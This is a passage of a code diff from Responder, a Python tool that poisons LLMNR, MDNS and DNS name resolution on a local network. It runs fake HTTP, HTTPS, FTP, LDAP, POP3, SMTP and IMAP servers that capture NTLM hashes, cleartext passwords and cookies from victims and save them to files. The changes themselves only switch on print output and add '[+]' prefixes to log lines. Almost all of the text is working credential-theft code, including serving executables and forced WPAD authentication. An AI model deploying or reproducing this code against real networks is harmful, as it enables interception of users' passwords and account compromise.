#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) == False: if RespondToSpecificName(RespondToName) == False:
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
@ -1318,17 +1320,17 @@ class LLMNR(BaseRequestHandler):
for x in range(1): for x in range(1):
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
@ -1385,7 +1387,7 @@ class DNS(BaseRequestHandler):
buff = DNSAns() buff = DNSAns()
buff.calculate(data) buff.calculate(data)
soc.sendto(str(buff), self.client_address) soc.sendto(str(buff), self.client_address)
#print "DNS Answer sent to: %s "%(self.client_address[0]) print "DNS Answer sent to: %s "%(self.client_address[0])
logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) logging.warning('DNS Answer sent to: %s'%(self.client_address[0]))
class DNSTCP(BaseRequestHandler): class DNSTCP(BaseRequestHandler):
@ -1399,7 +1401,7 @@ class DNSTCP(BaseRequestHandler):
buff = DNSAns() buff = DNSAns()
buff.calculate(data) buff.calculate(data)
self.request.send(str(buff)) self.request.send(str(buff))
#print "DNS Answer sent to: %s "%(self.client_address[0]) print "DNS Answer sent to: %s "%(self.client_address[0])
logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) logging.warning('DNS Answer sent to: %s'%(self.client_address[0]))
except Exception: except Exception:
@ -1454,14 +1456,14 @@ class MDNS(BaseRequestHandler):
try: try:
if Analyze(AnalyzeMode): if Analyze(AnalyzeMode):
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
#print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
if RespondToSpecificHost(RespondTo): if RespondToSpecificHost(RespondTo):
if Analyze(AnalyzeMode) == False: if Analyze(AnalyzeMode) == False:
if RespondToIPScope(RespondTo, self.client_address[0]): if RespondToIPScope(RespondTo, self.client_address[0]):
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data) Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName = Name) MDns = MDNSAns(AnswerName = Name)
@ -1470,7 +1472,7 @@ class MDNS(BaseRequestHandler):
if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False:
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
Name = Poisoned_MDNS_Name(data) Name = Poisoned_MDNS_Name(data)
MDns = MDNSAns(AnswerName = Name) MDns = MDNSAns(AnswerName = Name)
@ -1506,14 +1508,14 @@ def ParseHTTPHash(data,client):
outfile = os.path.join(ResponderPATH,"HTTP-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTP-NTLMv1-Client-"+client+".txt")
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
if PrintData(outfile,User+"::"+Hostname): if PrintData(outfile,User+"::"+Hostname):
#print "[+]HTTP NTLMv1 hash captured from :",client print "[+]HTTP NTLMv1 hash captured from :",client
#print "Hostname is :", Hostname print "Hostname is :", Hostname
#print "Complete hash is : ", WriteHash print "Complete hash is : ", WriteHash
WriteData(outfile,WriteHash, User+"::"+Hostname) WriteData(outfile,WriteHash, User+"::"+Hostname)
logging.warning('HTTP NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]HTTP NTLMv1 hash captured from :%s'%(client))
logging.warning('HTTP NTLMv1 Hostname is :%s'%(Hostname)) logging.warning('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname))
logging.warning('HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
logging.warning('HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash))
if NthashLen > 24: if NthashLen > 24:
NthashLen = 64 NthashLen = 64
@ -1529,19 +1531,19 @@ def ParseHTTPHash(data,client):
outfile = os.path.join(ResponderPATH,"HTTP-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTP-NTLMv2-Client-"+client+".txt")
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("HTTP NTLMv2 hash captured from :",client) print "[+]HTTP NTLMv2 hash captured from :",client
logging.warning("Complete hash is : ", WriteHash) print "Complete hash is : ", WriteHash
WriteData(outfile,WriteHash, User+"::"+Domain) WriteData(outfile,WriteHash, User+"::"+Domain)
logging.warning('HTTP NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client))
logging.warning('HTTP NTLMv2 User is : %s'%(User)) logging.warning('[+]HTTP NTLMv2 User is : %s'%(User))
logging.warning('HTTP NTLMv2 Domain is :%s'%(Domain)) logging.warning('[+]HTTP NTLMv2 Domain is :%s'%(Domain))
logging.warning('HTTP NTLMv2 Hostname is :%s'%(HostName)) logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName))
logging.warning('HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash))
def GrabCookie(data,host): def GrabCookie(data,host):
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data) Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
if Cookie: if Cookie:
CookieStr = "HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0))
logging.warning(CookieStr) logging.warning(CookieStr)
return Cookie.group(0) return Cookie.group(0)
else: else:
@ -1572,7 +1574,7 @@ def Basic_Ntlm(Basic):
return IIS_Auth_401_Ans() return IIS_Auth_401_Ans()
def ServeEXE(data,client, Filename): def ServeEXE(data,client, Filename):
Message = "Sent %s file sent to: %s."%(Filename,client) Message = "[+]Sent %s file sent to: %s."%(Filename,client)
logging.warning(Message) logging.warning(Message)
with open (Filename, "rb") as bk: with open (Filename, "rb") as bk:
data = bk.read() data = bk.read()
@ -1603,17 +1605,17 @@ def GrabURL(data, host):
POST = re.findall('(?<=POST )[^HTTP]*', data) POST = re.findall('(?<=POST )[^HTTP]*', data)
POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data) POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
if GET: if GET:
HostStr = "HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET))
logging.warning(HostStr) logging.warning(HostStr)
#print HostStr print HostStr
if POST: if POST:
Host3Str = "HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST))
logging.warning(Host3Str) logging.warning(Host3Str)
#print Host3Str print Host3Str
if len(''.join(POSTDATA)) >2: if len(''.join(POSTDATA)) >2:
PostData = 'The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
#print PostData print PostData
logging.warning(PostData) logging.warning(PostData)
#Handle HTTP packet sequence. #Handle HTTP packet sequence.
@ -1652,10 +1654,9 @@ def PacketSequence(data,client):
NTLM_Auth= b64decode(''.join(Ntlm)) NTLM_Auth= b64decode(''.join(Ntlm))
ParseHTTPHash(NTLM_Auth,client) ParseHTTPHash(NTLM_Auth,client)
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
Message = "WPAD (auth) file sent to: %s"%(client) Message = "[+]WPAD (auth) file sent to: %s"%(client)
if Verbose: if Verbose:
#print Message print Message
logging.warning(Message)
logging.warning(Message) logging.warning(Message)
buffer1 = WpadCustom(data,client) buffer1 = WpadCustom(data,client)
return buffer1 return buffer1
@ -1669,13 +1670,13 @@ def PacketSequence(data,client):
GrabURL(data,client) GrabURL(data,client)
outfile = os.path.join(ResponderPATH,"HTTP-Clear-Text-Password-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTP-Clear-Text-Password-"+client+".txt")
if PrintData(outfile,b64decode(''.join(BasicAuth))): if PrintData(outfile,b64decode(''.join(BasicAuth))):
logging.warning("HTTP-User & Password:", b64decode(''.join(BasicAuth))) print "[+]HTTP-User & Password:", b64decode(''.join(BasicAuth))
WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth)))
logging.warning('HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth))))
if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client):
Message = "WPAD (auth) file sent to: %s"%(client) Message = "[+]WPAD (auth) file sent to: %s"%(client)
if Verbose: if Verbose:
logging.warning(Message) print Message
logging.warning(Message) logging.warning(Message)
buffer1 = WpadCustom(data,client) buffer1 = WpadCustom(data,client)
return buffer1 return buffer1
@ -1697,10 +1698,9 @@ class HTTP(BaseRequestHandler):
data = self.request.recv(8092) data = self.request.recv(8092)
buff = WpadCustom(data,self.client_address[0]) buff = WpadCustom(data,self.client_address[0])
if buff and WpadForcedAuth(Force_WPAD_Auth) == False: if buff and WpadForcedAuth(Force_WPAD_Auth) == False:
Message = "WPAD (no auth) file sent to: %s"%(self.client_address[0]) Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0])
if Verbose: if Verbose:
#print Message print Message
logging.warning(Message)
logging.warning(Message) logging.warning(Message)
self.request.send(buff) self.request.send(buff)
else: else:
@ -1923,48 +1923,48 @@ def ParseHTTPSHash(data,client):
NthashOffset = struct.unpack('<H',data[24:26])[0] NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
if NthashLen == 24: if NthashLen == 24:
#print "[+]HTTPS NTLMv1 hash captured from :",client print "[+]HTTPS NTLMv1 hash captured from :",client
logging.warning('HTTPS NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]HTTPS NTLMv1 hash captured from :%s'%(client))
NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
HostNameLen = struct.unpack('<H',data[46:48])[0] HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] HostNameOffset = struct.unpack('<H',data[48:50])[0]
Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','') Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
#print "Hostname is :", Hostname print "Hostname is :", Hostname
logging.warning('HTTPS NTLMv1 Hostname is :%s'%(Hostname)) logging.warning('[+]HTTPS NTLMv1 Hostname is :%s'%(Hostname))
UserLen = struct.unpack('<H',data[36:38])[0] UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0] UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','') User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
#print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','') print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
logging.warning('HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv1-Client-"+client+".txt")
WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
WriteData(outfile,WriteHash, User+"::"+Hostname) WriteData(outfile,WriteHash, User+"::"+Hostname)
#print "Complete hash is : ", WriteHash print "Complete hash is : ", WriteHash
logging.warning('HTTPS NTLMv1 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTPS NTLMv1 Complete hash is :%s'%(WriteHash))
if NthashLen > 24: if NthashLen > 24:
#print "[+]HTTPS NTLMv2 hash captured from :",client print "[+]HTTPS NTLMv2 hash captured from :",client
logging.warning('HTTPS NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]HTTPS NTLMv2 hash captured from :%s'%(client))
NthashLen = 64 NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0] DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0] DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','') Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
#print "Domain is : ", Domain print "Domain is : ", Domain
logging.warning('HTTPS NTLMv2 Domain is :%s'%(Domain)) logging.warning('[+]HTTPS NTLMv2 Domain is :%s'%(Domain))
UserLen = struct.unpack('<H',data[36:38])[0] UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0] UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','') User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
#print "User is :", User print "User is :", User
logging.warning('HTTPS NTLMv2 User is : %s'%(User)) logging.warning('[+]HTTPS NTLMv2 User is : %s'%(User))
HostNameLen = struct.unpack('<H',data[44:46])[0] HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0] HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','') HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
#print "Hostname is :", HostName print "Hostname is :", HostName
logging.warning('HTTPS NTLMv2 Hostname is :%s'%(HostName)) logging.warning('[+]HTTPS NTLMv2 Hostname is :%s'%(HostName))
outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTPS-NTLMv2-Client-"+client+".txt")
WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
WriteData(outfile,WriteHash, User+"::"+Domain) WriteData(outfile,WriteHash, User+"::"+Domain)
#print "Complete hash is : ", WriteHash print "Complete hash is : ", WriteHash
logging.warning('HTTPS NTLMv2 Complete hash is :%s'%(WriteHash)) logging.warning('[+]HTTPS NTLMv2 Complete hash is :%s'%(WriteHash))
#Handle HTTPS packet sequence. #Handle HTTPS packet sequence.
def HTTPSPacketSequence(data,client): def HTTPSPacketSequence(data,client):
@ -1989,8 +1989,8 @@ def HTTPSPacketSequence(data,client):
GrabCookie(data,client) GrabCookie(data,client)
outfile = os.path.join(ResponderPATH,"HTTPS-Clear-Text-Password-"+client+".txt") outfile = os.path.join(ResponderPATH,"HTTPS-Clear-Text-Password-"+client+".txt")
WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b))) WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
#print "[+]HTTPS-User & Password:", b64decode(''.join(b)) print "[+]HTTPS-User & Password:", b64decode(''.join(b))
logging.warning('HTTPS-User & Password: %s'%(b64decode(''.join(b)))) logging.warning('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe)) buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
return buffer1 return buffer1
@ -2055,8 +2055,8 @@ class FTP(BaseRequestHandler):
data = self.request.recv(1024) data = self.request.recv(1024)
if data[0:4] == "USER": if data[0:4] == "USER":
User = data[5:].replace("\r\n","") User = data[5:].replace("\r\n","")
#print "[+]FTP User: ", User print "[+]FTP User: ", User
logging.warning('FTP User: %s'%(User)) logging.warning('[+]FTP User: %s'%(User))
t = FTPPacket(Code="331",Message="User name okay, need password.") t = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2064,8 +2064,8 @@ class FTP(BaseRequestHandler):
Pass = data[5:].replace("\r\n","") Pass = data[5:].replace("\r\n","")
Outfile = os.path.join(ResponderPATH,"FTP-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"FTP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,User+":"+Pass, User+":"+Pass) WriteData(Outfile,User+":"+Pass, User+":"+Pass)
#print "[+]FTP Password is: ", Pass print "[+]FTP Password is: ", Pass
logging.warning('FTP Password is: %s'%(Pass)) logging.warning('[+]FTP Password is: %s'%(Pass))
t = FTPPacket(Code="530",Message="User not logged in.") t = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2110,11 +2110,11 @@ def ParseLDAPHash(data,client):
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
Outfile = os.path.join(ResponderPATH,"LDAP-NTLMv1-"+client+".txt") Outfile = os.path.join(ResponderPATH,"LDAP-NTLMv1-"+client+".txt")
WriteData(Outfile,writehash,User+"::"+Domain) WriteData(Outfile,writehash,User+"::"+Domain)
#print "[LDAP] NTLMv1 complete hash is :", writehash print "[LDAP] NTLMv1 complete hash is :", writehash
logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash)) logging.warning('[LDAP] NTLMv1 complete hash is :%s'%(writehash))
if LMhashLen <2 : if LMhashLen <2 :
Message = 'LDAP Anonymous NTLM authentication, ignoring..' Message = '[+]LDAP Anonymous NTLM authentication, ignoring..'
#print Message print Message
logging.warning(Message) logging.warning(Message)
def ParseNTLM(data,client): def ParseNTLM(data,client):
@ -2142,7 +2142,7 @@ def ParseLDAPPacket(data,client):
if AuthHeaderType == "\x80": if AuthHeaderType == "\x80":
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0] PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen] Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
#print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password print '[LDAP]Clear Text User & Password is:', UserDomain+":"+Password
outfile = os.path.join(ResponderPATH,"LDAP-Clear-Text-Password-"+client+".txt") outfile = os.path.join(ResponderPATH,"LDAP-Clear-Text-Password-"+client+".txt")
WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password)) WriteData(outfile,'[LDAP]User: %s Password: %s'%(UserDomain,Password),'[LDAP]User: %s Password: %s'%(UserDomain,Password))
logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password)) logging.warning('[LDAP]User: %s Password: %s'%(UserDomain,Password))
@ -2153,7 +2153,7 @@ def ParseLDAPPacket(data,client):
buff = ParseSearch(data) buff = ParseSearch(data)
return buff return buff
else: else:
logging.warning('[LDAP]Operation not supported') print '[LDAP]Operation not supported'
#LDAP Server Class #LDAP Server Class
class LDAP(BaseRequestHandler): class LDAP(BaseRequestHandler):
@ -2187,7 +2187,7 @@ class POP(BaseRequestHandler):
data = self.request.recv(1024) data = self.request.recv(1024)
if data[0:4] == "USER": if data[0:4] == "USER":
User = data[5:].replace("\r\n","") User = data[5:].replace("\r\n","")
logging.warning('POP3 User: %s'%(User)) logging.warning('[+]POP3 User: %s'%(User))
t = POPOKPacket() t = POPOKPacket()
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2195,8 +2195,8 @@ class POP(BaseRequestHandler):
Pass = data[5:].replace("\r\n","") Pass = data[5:].replace("\r\n","")
Outfile = os.path.join(ResponderPATH,"POP3-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"POP3-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,User+":"+Pass, User+":"+Pass) WriteData(Outfile,User+":"+Pass, User+":"+Pass)
#print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass) print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)
logging.warning("POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)) logging.warning("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass))
t = POPOKPacket() t = POPOKPacket()
self.request.send(str(t)) self.request.send(str(t))
data = self.request.recv(1024) data = self.request.recv(1024)
@ -2233,8 +2233,8 @@ class ESMTP(BaseRequestHandler):
Password = b64decode(data[:len(data)-2]) Password = b64decode(data[:len(data)-2])
Outfile = os.path.join(ResponderPATH,"SMTP-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"SMTP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,Username+":"+Password, Username+":"+Password) WriteData(Outfile,Username+":"+Password, Username+":"+Password)
#print "SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
logging.warning("SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)) logging.warning("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password))
except Exception: except Exception:
pass pass
@ -2260,8 +2260,8 @@ class IMAP(BaseRequestHandler):
Credentials = data[10:].strip() Credentials = data[10:].strip()
Outfile = os.path.join(ResponderPATH,"IMAP-Clear-Text-Password-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"IMAP-Clear-Text-Password-"+self.client_address[0]+".txt")
WriteData(Outfile,Credentials, Credentials) WriteData(Outfile,Credentials, Credentials)
#print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials) print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)
logging.warning('IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)) logging.warning('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials))
self.request.send(str(ditchthisconnection())) self.request.send(str(ditchthisconnection()))
data = self.request.recv(1024) data = self.request.recv(1024)